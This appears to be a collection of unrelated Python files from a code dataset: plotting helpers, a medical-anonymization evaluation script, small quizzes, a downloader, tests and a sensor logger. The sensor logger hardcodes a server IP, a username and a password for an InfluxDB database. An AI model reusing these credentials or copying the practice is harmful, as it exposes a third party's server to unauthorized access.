rank\r\n\r\n\tcsv_file = open(\"machines_jobs_list.csv\", \"r\")\r\n\tcr = csv.reader(csv_file)\r\n\r\n\tfor row in cr:\r\n\t\tjob_number = int(row[0])\r\n\t\tmachine_number = int(row[1])\r\n\t\tlocal_master_rank = int(row[2])\r\n\t\tmachines_jobs_list[machine_number].append(job_number)\r\n\t\tif local_master_list[machine_number] == -1:\r\n\t\t\tlocal_master_list[machine_number] = local_master_rank\r\n\tcsv_file.close()\r\n\r\n\tmaster_info = (machines_jobs_list, local_master_list)\r\n\r\n\treturn master_info\r\n\r\ndef get_machines_jobs_list(machines_jobs_list_flat, machines_jobs_list_sizes):\r\n\tmachines_jobs_list = [[] for _ in range(len(machines_jobs_list_sizes))]\r\n\tm_i = 0\r\n\tct0 = 0\r\n\tfor i in range(len(machines_jobs_list_flat)):\r\n\t\tmachines_jobs_list[m_i].append(machines_jobs_list_flat[i])\r\n\t\tct0 += 1\r\n\t\tif ct0 == machines_jobs_list_sizes[m_i]:\r\n\t\t\tm_i += 1\r\n\t\t\tct0 = 0\r\n\treturn machines_jobs_list\r\n\r\ndef get_worker_info_from_machines_jobs_list(n,k,machines_jobs_list, rank):\r\n\r\n\tjob_number_worker = -1\r\n\tlocal_master_rank = -1\r\n\tlocal_process_rank_list = []\r\n\r\n\tct_rank = 0\r\n\tct_master_rank = 0\r\n\tfor n_i in range(n):\r\n\t\tfor job_number in machines_jobs_list[n_i]:\r\n\t\t\tif rank == ct_rank:\r\n\t\t\t\tjob_number_worker = job_number\r\n\t\t\t\tlocal_master_rank = ct_master_rank\r\n\t\t\t\tlocal_process_rank_list = [(local_master_rank + i2) for i2 in 
range(len(machines_jobs_list[n_i]))]\r\n\t\t\tct_rank +=1\r\n\t\tct_master_rank += len(machines_jobs_list[n_i])\r\n\t\r\n\treturn job_number_worker, local_master_rank, local_process_rank_list\r\n\r\n\r\n\r\ndef just_get_machine_failed_list(n, eps):\r\n\tmachine_failed_list = []\r\n\tfor i in range(n):\r\n\t\tif eps > np.random.random():\r\n\t\t\tmachine_failed_list.append(i)\r\n\t\telse:\r\n\t\t\tpass\r\n\treturn machine_failed_list\r\n\r\ndef save_suc_Tss_list(k, ns, suc_Tss):\r\n\tcsv_file = open(\"suc_Tss_list.csv\", \"w\")\r\n\tcw = csv.writer(csv_file , delimiter=',', quotechar='|')\r\n\r\n\tfor i in range(len(ns)):\r\n\t\trow = [str(int(k)), str(int(ns[i]))]\r\n\t\trow.extend([ str(suc_T) for suc_T in suc_Tss[i]] )\r\n\t\tcw.writerow(row)\r\n\tcsv_file.close()\r\n\r\ndef save_success_rate_list_sim(ns, success_rates, eps):\r\n\tcsv_file = open(\"success_rate_list_eps%f.csv\" % eps, \"w\")\r\n\tcw = csv.writer(csv_file , delimiter=',', quotechar='|')\r\n\r\n\tfor i in range(len(ns)):\r\n\t\tcw.writerow([str(ns[i]), str(success_rates[i])])\r\n\tcsv_file.close()\r\n\r\ndef plotting(k, ns, Ts, success_rates_Ts):\r\n\tndivk = [ns[i]/float(k) for i in range(len(ns))]\r\n\t# print \"n/k\", ndivk\r\n\t# ndivk = [1.0, 1.2, 1.4]\r\n\t# success_rates_Ts = [[0.2, 0.6, 0.8], [0.9, 0.95, 1.0]]\r\n\t\r\n\tfor i in range(len(Ts)):\r\n\t\tplt.plot(ndivk, success_rates_Ts[i], label='T=%.2f'% Ts[i])\r\n\t\r\n\tplt.title('LDGM Success Rate for k=%d' % k)\r\n\tplt.xlabel('Ratio of machines to jobs (n/k)')\r\n\tplt.ylabel('Success Rate')\r\n\tplt.legend(loc = 4)\r\n\t# plt.show()\r\n\tplt.savefig('f_cluster.png')\r\n\r\n\r\ndef plotting_sim(k, ns, epss, success_rates_epss):\r\n\tndivk = [ns[i]/float(k) for i in range(len(ns))]\r\n\t# print \"n/k\", ndivk\r\n\t\r\n\t# ndivk = [1.0, 1.2, 1.4]\r\n\t# success_rates_Ts = [[0.2, 0.6, 0.8], [0.9, 0.95, 1.0]]\r\n\t\r\n\r\n\tfor i in range(len(epss)):\r\n\t\tplt.plot(ndivk, success_rates_epss[i], label='eps=%f'% epss[i])\r\n\t\r\n\tplt.title('LDGM Success Rate (sim) for k=%d' % k)\r\n\tplt.xlabel('Ratio of machines to jobs (n/k)')\r\n\tplt.ylabel('Success Rate')\r\n\tplt.legend(loc = 4)\r\n\t# plt.show()\r\n\tplt.savefig('f_sim.png')\r\n\r\n\r\ndef save_arrival_time_list(arrival_time, n):\r\n\tcsv_file = open(\"arrival_time_n%d.csv\"%n, \"w\")\r\n\tcw = csv.writer(csv_file , delimiter=',', quotechar='|')\r\n\tfor i in range(len(arrival_time)):\r\n\t\tcw.writerow([str(arrival_time[i])])\r\n\tcsv_file.close()\r\n\r\ndef plot_histogram(suc_Ts, n, k):\r\n\tplt.hist(suc_Ts, bins=10, color= 'b')\r\n\tplt.title('Success T for k=%d, n=%d' % (k,n))\r\n\tplt.xlabel('T')\r\n\tplt.ylabel('count')\r\n\t# plt.show()\r\n\tplt.savefig('f_T_k=%d, n=%d.png' % (k,n))","sub_path":"Actual_jc_T/graph_subroutines.py","file_name":"graph_subroutines.py","file_ext":"py","file_size_in_byte":9616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"569789633","text":"# coding=utf-8\n###############################################################################\n#\n# Copyright 2019 Secretaría de Estado para el Avance Digital (SEAD)\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do 
so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n# MEDDOCAN Evaluation Script\n#\n# This script is distributed as apart of the Medical Document Anonymization\n# (MEDDOCAN) task. It is inspired on the evaluation script from the i2b2\n# 2014 Cardiac Risk and Personal Health-care Information (PHI) tasks. It is\n# intended to be used via command line:\n#\n# $> python evaluate.py [i2b2|brat] [ner|spans] GOLD SYSTEM\n#\n# It produces Precision, Recall and F1 (P/R/F1) and leak score measures for\n# the NER subtrack and P/R/F1 for the SPAN subtrack. The latter includes a\n# relaxed metric where the spans are merged if only non-alphanumerical\n# characters are found between them.\n#\n# SYSTEM and GOLD may be individual files or also directories in which case\n# all files in SYSTEM will be compared to files the GOLD directory based on\n# their file names.\n#\n# Basic Examples:\n#\n# $> python evaluate.py i2b2 ner gold/01.xml system/run1/01.xml\n#\n# Evaluate the single system output file '01.xml' against the gold standard\n# file '01.xml' NER subtrack. Input files in i2b2 format.\n#\n# $> python evaluate.py brat ner gold/01.ann system/run1/01.ann\n#\n# Evaluate the single system output file '01.ann' against the gold standard\n# file '01.ann' NER subtrack. Input files in BRAT format.\n#\n# $> python evaluate.py i2b2 spans gold/ system/run1/\n#\n# Evaluate the set of system outputs in the folder system/run1 against the\n# set of gold standard annotations in gold/ using the SPANS subtrack. Input\n# files in i2b2 format.\n#\n# $> python evaluate.py brat ner gold/ system/run1/ system/run2/ system/run3/\n#\n# Evaluate the set of system outputs in the folder system/run1, system/run2\n# and in the folder system/run3 against the set of gold standard annotations\n# in gold/ using the NER subtrack. Input files in BRAT format.\nimport os\nimport argparse\nfrom classes import i2b2Annotation, BratAnnotation, NER_Evaluation, Span_Evaluation\nfrom collections import defaultdict\n\n\ndef get_document_dict_by_system_id(system_dirs, annotation_format):\n \"\"\"Takes a list of directories and returns annotations. \"\"\"\n\n documents = defaultdict(lambda: defaultdict(int))\n\n for d in system_dirs:\n for fn in os.listdir(d):\n if fn.endswith(\".ann\") or fn.endswith(\".xml\"):\n sa = annotation_format(os.path.join(d, fn))\n documents[sa.sys_id][sa.id] = sa\n\n return documents\n\n\ndef evaluate(gs, system, annotation_format, subtrack, **kwargs):\n \"\"\"Evaluate the system by calling either NER_evaluation or Span_Evaluation.\n 'system' can be a list containing either one file, or one or more\n directories. 'gs' can be a file or a directory. 
\"\"\"\n\n gold_ann = {}\n evaluations = []\n\n # Strip verbose keyword if it exists\n try:\n verbose = kwargs['verbose']\n del kwargs['verbose']\n except KeyError:\n verbose = False\n\n # Handle if two files were passed on the command line\n if os.path.isfile(system[0]) and os.path.isfile(gs):\n if (system[0].endswith(\".ann\") and gs.endswith(\".ann\")) or \\\n (system[0].endswith(\".xml\") or gs.endswith(\".xml\")):\n gs = annotation_format(gs)\n sys = annotation_format(system[0])\n e = subtrack({sys.id: sys}, {gs.id: gs}, **kwargs)\n e.print_docs()\n evaluations.append(e)\n\n # Handle the case where 'gs' is a directory and 'system' is a list of directories.\n elif all([os.path.isdir(sys) for sys in system]) and os.path.isdir(gs):\n # Get a dict of gold annotations indexed by id\n\n for filename in os.listdir(gs):\n if filename.endswith(\".ann\") or filename.endswith(\".xml\"):\n annotations = annotation_format(os.path.join(gs, filename))\n gold_ann[annotations.id] = annotations\n\n for system_id, system_ann in sorted(get_document_dict_by_system_id(system, annotation_format).items()):\n e = subtrack(system_ann, gold_ann, **kwargs)\n e.print_report(verbose=verbose)\n evaluations.append(e)\n\n else:\n Exception(\"Must pass file file or [directory/]+ directory/\"\n \"on command line!\")\n\n return evaluations[0] if len(evaluations) == 1 else evaluations\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Evaluation script for the MEDDOCAN track.\")\n\n parser.add_argument(\"format\",\n choices=[\"i2b2\", \"brat\"],\n help=\"Format\")\n parser.add_argument(\"subtrack\",\n choices=[\"ner\", \"spans\"],\n help=\"Subtrack\")\n parser.add_argument('-v', '--verbose',\n help=\"List also scores for each document\",\n action=\"store_true\")\n parser.add_argument(\"gs_dir\",\n help=\"Directory to load GS from\")\n parser.add_argument(\"sys_dir\",\n help=\"Directories with system outputs (one or more)\",\n nargs=\"+\")\n\n args = parser.parse_args()\n\n evaluate(args.gs_dir,\n args.sys_dir,\n i2b2Annotation if args.format == \"i2b2\" else BratAnnotation,\n NER_Evaluation if args.subtrack == \"ner\" else Span_Evaluation,\n verbose=args.verbose)\n","sub_path":"finalSubmission/code/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":6459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"278676799","text":"s=''\r\nfor i in open('names.txt'):\r\n s=i\r\n print(s)\r\ns=s.replace('\"','').split(\",\")\r\nprint(type(s))\r\nprint(s)\r\nprint(len(s))\r\ns=sorted(s)\r\nprint(s)\r\ndef run(x):\r\n lst=[]\r\n for i in x.lower():\r\n lst.append(ord(i)-96)\r\n #print(lst)\r\n return sum(lst)\r\n#str=''\r\ni=1\r\ny=0\r\nfor each in range(0,len(s)):\r\n y+=run(s[each])*i\r\n i+=1\r\nprint(y)\r\n#print(str)\r\n#print(run(str))\r\n#str+=s[each]\r\n","sub_path":"class_4_1.py","file_name":"class_4_1.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"27922652","text":"from tqdm import tqdm\nimport requests\nimport os\nimport json\nimport sys\n\nDOWNLOAD_FILE = \"./downloader/\"\nos.makedirs(DOWNLOAD_FILE, exist_ok=True)\nprint(sys.argv[1])\nwith open(sys.argv[1]) as file:\n download_list = json.load(file)\ni = 1\nfor download_item in download_list:\n res = requests.get(download_item.get('download_link'), stream=True)\n total_size = int(res.headers['content-length'])\n filename = \"{}{}\".format(DOWNLOAD_FILE, 
download_item.get('title'), download_item.get('download_link').split(\".\")[-1])\n\n    total_kb = total_size / 1024\n    total_mb = total_size / (1024 * 1024)\n\n    unit = \"MB\" if total_mb >= 1 else \"KB\"\n    total = total_mb if total_mb >= 1 else total_kb\n    chunk_size = (1024 * 1024) if total_mb >= 1 else 1024\n\n    with open(filename, \"wb\") as f:\n        for data in tqdm(iterable=res.iter_content(chunk_size=chunk_size), total=total, unit=unit):\n            f.write(data)\n    print(\"file %s completed !\" % i)\n    i += 1\n\nprint(\">>>>>> All downloads completed ! <<<<<<\")","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"167937924","text":"#!/Users/Jonman/anaconda/bin/python3\nimport asyncio as snc\n\n\nasync def compute(x, y):\n    print( \"Compute {} + {}...\".format( x, y))\n    await snc.sleep( 10)\n    return x + y\n    \n    \nasync def print_sum(x, y):\n    result = await compute( x, y)\n    print( \"{} + {} = {}\".format( x, y, result))\n    \n    \nloop = snc.get_event_loop() # Get the event loop of the current context\nloop.run_until_complete( print_sum( 2, 4)) # Blocking call that returns when the print_sum() coroutine is done\nloop.close()\n","sub_path":"asyncio/coroutine_chaining.py","file_name":"coroutine_chaining.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"496601067","text":"import random  # import random library\n\n# get input from the user\nprint(\"Welcome to 'roll the dice'\")\ni = int(input(\"\\nEnter the maximum value of Dice: \"))\n\nwant = \"y\" \n\nwhile want == \"y\":\n    print(random.randrange(1, i+1, 1))\n    want = input(\"Do you want to roll the dice again (y/n): \")\n\nprint(\"\\nThank you for rolling the dice\")\n\n","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"14856536","text":"'''\nData preprocessing\n'''\nimport os\n\nimport pandas as pd\nimport torch\n\n''' Read the dataset '''\nos.makedirs(os.path.join('.', 'data'), exist_ok=True)  # os.path.join: joins path components\ndata_file = os.path.join('.', 'data', 'house_tiny.csv')\nwith open(data_file, 'w') as f:\n    f.write('NumRooms,Alley,Price\\n')  # column names\n    f.write('NA,Pave,127500\\n')  # each row is one data sample\n    f.write('2,NA,106000\\n')\n    f.write('4,NA,178100\\n')\n    f.write('NA,NA,140000\\n')\n\ndata = pd.read_csv(data_file)\nprint(data)\n\n''' Handle missing values: imputation and deletion '''\ninputs, outputs = data.iloc[:, 0:2], data.iloc[:, 2]\ninputs = inputs.fillna(inputs.mean())\nprint(inputs)\n\ninputs = pd.get_dummies(inputs, dummy_na=True)\nprint(inputs)\n\n''' Convert to the tensor format '''\nX, y = torch.tensor(inputs.values), torch.tensor(outputs.values)\nprint(X, y)\n","sub_path":"d2l/c1_foundation/prep_pandas.py","file_name":"prep_pandas.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"322348620","text":"#Acceleration Status of Health\r\nimport time\r\nimport datetime\r\nimport board\r\nimport busio\r\nimport json\r\nfrom uuid import getnode as get_mac\r\nimport uuid\r\nfrom collections import OrderedDict\r\nimport os\r\nfrom datetime import datetime\r\nimport socket\r\nimport sys\r\nfrom influxdb import InfluxDBClient\r\n\r\n# Configure InfluxDB connection variables\r\nhost = \"34.227.68.135\" # AWS EC2 Instance_ID i-0610264e5f0651062\r\nport = 8086 # default 
port\r\nuser = \"rpi\" # the user/password created for the pi, with write access\r\npassword = \"4DAF966B44\"\r\ndbname = \"OSNDS\" # the database we created earlier\r\n\r\n# Create the InfluxDB client object\r\nclient = InfluxDBClient(host, port, user, password, dbname)\r\n\r\n#Imports the Accelerometer Sensor (lsm9ds1)\r\nimport adafruit_lsm9ds1\r\n\r\n# Initialize the I2C bus.\r\ni2c = busio.I2C(board.SCL, board.SDA)\r\n\r\n#Initializes global variables\r\nglobal accelerationSensor\r\nglobal startTime\r\n\r\n#Method to initialize all sensors using the global variables\r\ndef initializeSensors():\r\n    #Initialize the Acceleration Sensor (lsm9ds1)\r\n    global accelerationSensor\r\n    global startTime\r\n    startTime = int(round(time.time() * 1000))\r\n    try:\r\n        accelerationSensor = adafruit_lsm9ds1.LSM9DS1_I2C(i2c)\r\n    except(OSError, ValueError):\r\n        print(\"Acceleration sensor not detected\")\r\n\r\ndef getJSON3(value, data_type, label):\r\n    sampleUUID = str(uuid.uuid1())\r\n    jsonFormat = [\r\n        {\r\n            \"measurement\": data_type,\r\n            \"tags\": {\r\n                \"UNIT_ID\": socket.gethostname(),\r\n                \"SAMPLE_ID\": sampleUUID,\r\n            },\r\n            \"time\": value[3],\r\n            \"fields\": {\r\n                label+\"x\" : value[0],\r\n                label+\"y\" : value[1],\r\n                label+\"z\" : value[2],\r\n            }\r\n        }\r\n    ]\r\n\r\n    print(jsonFormat)\r\n    # Send the JSON data to InfluxDB\r\n    client.write_points(jsonFormat)\r\n    return str(jsonFormat)\r\n\r\n#Method to get Acceleration (LSM9DS1)\r\ndef getAcceleration():\r\n    accelerationArray = []\r\n    accel_x, accel_y, accel_z = accelerationSensor.acceleration\r\n    accelerationArray.append(accel_x)\r\n    accelerationArray.append(accel_y)\r\n    accelerationArray.append(accel_z)\r\n    accelerationArray.append(time.ctime())\r\n    return accelerationArray\r\n\r\n#Saves data to local storage\r\ndef saveToFile(msg):\r\n    fileName = time.strftime(\"%d-%m-%Y\", time.localtime()) + \"_data.txt\"\r\n    f = open(fileName, \"a+\")\r\n    f.write(msg)\r\n    f.write(\"\\n\")\r\n    f.close()\r\n\r\n#Method that begins collecting data \r\ndef runAllSensors():\r\n    #global startTime\r\n    #Poll rates in counts per second\r\n    #accelerationPollRate = 1\r\n    timing1 = datetime.now()\r\n    counter = 0\r\n    while True:\r\n        #Initializes the time\r\n        #ctime = int(round(time.time() * 1000))\r\n        #Gets acceleration data at correct poll rate\r\n        #if(ctime >= startTime):\r\n        try:\r\n            msg = getJSON3(getAcceleration(), \"acceleration\", \"M/S^2\")\r\n            saveToFile(msg)\r\n            timing2 = datetime.now()\r\n            runtime = timing2 - timing1\r\n            print(\"TOTAL RUNTIME IS \", runtime)\r\n            print(\"counter = \", counter)\r\n            counter+=1\r\n            #startTime += accelerationPollRate\r\n        except(OSError, ValueError):\r\n            print(\"Acceleration sensor not detected\")\r\n\r\ninitializeSensors()\r\nrunAllSensors()\r\n","sub_path":"SeperateSensors/accelerationHighResolutionFAST.py","file_name":"accelerationHighResolutionFAST.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"158760869","text":"\n\ndef build_word_cloud(words):\n    # Use a dictionary because we need to store a key and value.\n    cloud = {}\n    ignore = [',', '.', '\\'', '\"', ':', ';', '!',\n              '@', '#', '$', '%', '^', '&', '*', '(', ')']\n\n    # Default is to split on whitespace.\n    # O(n) where n is the length of the string.\n    tokens = words.split()\n    for token in tokens:\n        token = token.lower()\n\n        first = token[0]\n        if first in ignore:\n            token = token[1:]\n\n        # the token may be empty after stripping (e.g. a lone punctuation mark)\n        if token and token[-1] in ignore:\n            token = token[:-1]\n        if not token:\n            continue\n\n        if token not in 
cloud:\n            cloud[token] = 0\n        cloud[token] += 1\n\n    return cloud\n\n\ndef build_word_cloud2(words):\n    # Use a dictionary because we need to store a key and value.\n    cloud = {}\n    word = ''\n\n    for char in words:\n        if char == ' ':\n            if word:\n                if word not in cloud:\n                    cloud[word] = 0\n                cloud[word] += 1\n            # Start a new word.\n            word = ''\n            continue\n\n        if char.isalpha():\n            word += char.lower()\n\n    # Flush the last word, which has no trailing space to trigger the count.\n    if word:\n        if word not in cloud:\n            cloud[word] = 0\n        cloud[word] += 1\n\n    return cloud\n\n\nif __name__ == \"__main__\":\n    cloud = build_word_cloud2(\n        'After beating the eggs, Dana read the next step: Add milk and eggs, then add flour and sugar.')\n    print(cloud)\n    cloud = build_word_cloud(\n        'After beating the eggs, Dana read the next step: Add milk and eggs, then add flour and sugar.')\n    print(cloud)\n","sub_path":"cake/word-cloud/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"483468089","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'58tongcheng'\n\n_author_='wangjianfeng'\n\nfrom multiprocessing import Pool\nfrom channel_extract_mine import channel_list\nfrom pages_parsing_mine import get_links_from\n\ndef get_all_links_from(channel):\n    for i in range(1,100):\n        get_links_from(channel,i)\n\nif __name__=='__main__':\n    pool=Pool()\n    pool.map(get_all_links_from,channel_list.split())","sub_path":"Week_2/2_2/2_2code_of_video/58_mine/main_mine.py","file_name":"main_mine.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"547198566","text":"# python Math question generator\r\nimport random\r\n# ask user for question type\r\nquestionType = input(\"What type of question would you like? +, -, * or /? \")\r\n\r\ndef q(qt):\r\n    global ans\r\n    global num1\r\n    global num2\r\n    global score\r\n    global userAns\r\n    score = 0\r\n    if qt == \"+\":\r\n        #addition\r\n        print(\"You Selected addition!\")\r\n        num1 = random.randint(-99,99)\r\n        num2 = random.randint(-99,99)\r\n        ans = num1 + num2\r\n        userAns = input(\"What is \"+ str(num1) +\" + \"+ str(num2) +\"? \")\r\n        userAns = int(userAns)\r\n        if userAns == ans:\r\n            print(\"You are right!\")\r\n            score += 1\r\n        else:\r\n            print(\"You are wrong!\")\r\n            print(\"The correct answer was: \", ans)\r\n    elif qt == \"-\":\r\n        #subtraction\r\n        print(\"You Selected subtraction!\")\r\n        num1 = random.randint(-99,99)\r\n        num2 = random.randint(-99,99)\r\n        ans = num1 - num2\r\n        userAns = input(\"What is \"+ str(num1) +\" - \"+ str(num2) +\"? \")\r\n        userAns = int(userAns)\r\n        if userAns == ans:\r\n            print(\"You are right!\")\r\n            score += 1\r\n        else:\r\n            print(\"You are wrong!\")\r\n            print(\"The correct answer was: \", ans)\r\n    elif qt == \"*\":\r\n        #multiplication\r\n        print(\"You Selected multiplication!\")\r\n        num1 = random.randint(-99,99)\r\n        num2 = random.randint(-99,99)\r\n        ans = num1 * num2\r\n        userAns = input(\"What is \"+ str(num1) +\" * \"+ str(num2) +\"? \")\r\n        userAns = int(userAns)\r\n        if userAns == ans:\r\n            print(\"You are right!\")\r\n            score += 1\r\n        else:\r\n            print(\"You are wrong!\")\r\n            print(\"The correct answer was: \", ans)\r\n    elif qt == \"/\":\r\n        #division\r\n        print(\"Your answer will be rounded to the nearest tenth\")\r\n        print(\"You Selected division!\")\r\n        num1 = random.randint(-99,99)\r\n        num2 = random.randint(-99,99)\r\n        while num2 == 0:\r\n            num2 = random.randint(-99,99)\r\n        ans = num1 / num2\r\n        userAns = input(\"What is \"+ str(num1) +\" / \"+ str(num2) +\"? 
\")\r\n userAns = float(userAns)\r\n ans = round(ans,1)\r\n if userAns == ans:\r\n print(\"You are right!\")\r\n score += 1\r\n else:\r\n print(\"You are wrong!\")\r\n print(\"The correct answer was: \", ans)\r\n else:\r\n print(\"Please enter a valid operation, such as +, -, * and /\")\r\n qt = input(\"What type of question would you like? +, -, * or /? \")\r\n q(qt)\r\ndef again():\r\n #ask user if they wanna play again\r\n question = input(\"Would you like to play again? Y/N \")\r\n question = question.upper()\r\n if question == \"Y\":\r\n questionType = input(\"What type of question would you like? +, -, * or /? \")\r\n #wrap functions around\r\n q(questionType)\r\n again()\r\n return\r\n else:\r\n print(\"Hope you enjoyed your stay!\")\r\n return\r\nq(questionType) \r\nagain()\r\n\r\n","sub_path":"math.py","file_name":"math.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"614620124","text":"import unittest\nimport mock\nfrom shipshift.libs.ConfigurationManager import ConfigurationManager\n\n\nclass TestConfigurationManager(unittest.TestCase):\n def setUp(self):\n self.cm = ConfigurationManager('tests/files/cm_test.yaml')\n\n def tearDown(self):\n pass\n\n def test_configuration_file_loaded(self):\n self.assertNotEqual(self.cm._get_config(), {})\n\n def test_cannot_overwrite_configurations(self):\n self.cm = ConfigurationManager()\n self.assertNotEqual(self.cm._get_config(), {})\n\n old_config = self.cm._get_config()\n self.cm = ConfigurationManager('blabla/not_exists.yaml')\n self.assertEqual(old_config, self.cm._get_config())\n\n def test_get_artifact(self):\n expected = [\n {\n 'name': '.+\\\\.log',\n 'tags': ['log-file']\n },\n {\n 'name': '^test-results.xml',\n 'tags': ['test-results', 'xml-file']\n }\n ]\n self.assertEqual(self.cm.get_artifact(), expected)\n\n def test_get_jenkins(self):\n expected = [\n {\n 'zmq': 'tcp://jenkins1.shipshift.io:8888',\n 'url': 'https://jenkins1.shipshift.io'\n },\n {\n 'zmq': 'udp://jenkins2.shipshift.io:8899',\n 'url': 'http://jenkins2.shipshift.io:8080'\n }\n ]\n self.assertEqual(self.cm.get_jenkins(), expected)\n\n def test_get_path_default_value(self):\n self.assertEqual(self.cm.get_path(), '/var/www/html')\n\n @mock.patch.object(ConfigurationManager, '_get_config')\n def test_get_path(self, _mock_get_config):\n my_path = '/usr/share/nginx/html'\n _mock_get_config.return_value = {'path': my_path}\n self.assertEqual(self.cm.get_path(), my_path)\n\n def test_get_url_default_value(self):\n self.assertEqual(self.cm.get_url(), 'http://localhost')\n\n @mock.patch.object(ConfigurationManager, '_get_config')\n def test_get_url(self, _mock_get_config):\n my_url = 'http://172.17.0.1:82'\n _mock_get_config.return_value = {'url': my_url}\n self.assertEqual(self.cm.get_url(), my_url)\n\n def test_get_gearman(self):\n server, port = self.cm.get_gearman()\n self.assertEqual(server, 'logs.myhost.io')\n self.assertEqual(port, 9911)\n\n def test_get_output(self):\n outputs = self.cm.get_output()\n expected = {\n 'protocol': 'redis',\n 'server': 'redis.myhost.io',\n 'port': 6379\n }\n self.assertEqual(outputs, expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/unit/test_configuration_manager.py","file_name":"test_configuration_manager.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"286943917","text":"print(\"Forgot what gift was 
given on one of the last five days of Christmas?\")  #Title and purpose of program\r\nprint(\"Enter a number between 1 and 5:\")\r\n\r\nnum1 = int(input())\r\n \r\n#This loop allows for people to type the wrong number and still have a chance to put the right number in.\r\ninvalid_input = 1\r\nwhile invalid_input == 1:\r\n    if num1 == 1:\r\n        print(\"1 partridge in a pear tree.\")\r\n        invalid_input = 0\r\n    elif num1 == 2:\r\n        print(\"2 turtle doves\")\r\n        invalid_input = 0\r\n    elif num1 == 3:\r\n        print(\"3 French hens\")\r\n        invalid_input = 0\r\n    elif num1 == 4:\r\n        print(\"4 calling birds\")\r\n        invalid_input = 0\r\n    elif num1 == 5:\r\n        print(\"5 golden rings\")\r\n        invalid_input = 0\r\n    else:\r\n        print(\"Please enter a NUMBER BETWEEN 1 and 5\")\r\n        num1 = int(input())\r\n        invalid_input = 1\r\n\r\n","sub_path":"Python 1/Lab 2 Part 1.py","file_name":"Lab 2 Part 1.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"529302064","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 21 10:23:48 2019\n\n@author: nina\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 21 01:08:44 2019\n\n@author: nina\n\"\"\"\n\nfrom IPython.display import display\nimport sympy\nfrom sympy import Function, sqrt, dsolve, Eq, Derivative\nfrom sympy import solve, Poly, Eq, Function, exp\nfrom sympy import Indexed, IndexedBase, Tuple, sqrt\n\n\nt = sympy.Symbol('t')\nd=0\no=0.5\nro00=Function('ro00')(t)\nro01=Function('ro01')(t)\nro10=Function('ro10')(t)\nro11=Function('ro11')(t)\nI = sympy.Symbol('I')\n\neq1 = Eq(Derivative(ro00,t), ro11 - I*(o*ro01/2 - o*ro10/2))\neq2 = Eq(Derivative(ro01,t), -ro01 - I*(-d*ro01 + o*ro00/2 - o*ro11/2))\neq3 = Eq(Derivative(ro10,t),-ro10 - I*(d*ro10 - o*ro00/2 + o*ro11/2))\neq4 = Eq(Derivative(ro11,t), -ro11 - I*(-o*ro01/2 + o*ro10/2))\n\n\"the solution comes with constants C1, C2 and C3\"\nsoln = dsolve((eq1, eq2, eq3, eq4))\ndisplay(soln)\nprint(soln)","sub_path":"resavanjeDifJna.py","file_name":"resavanjeDifJna.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"605235023","text":"import data_generator as dg  # Creates a random list of int between -5 and 10. 
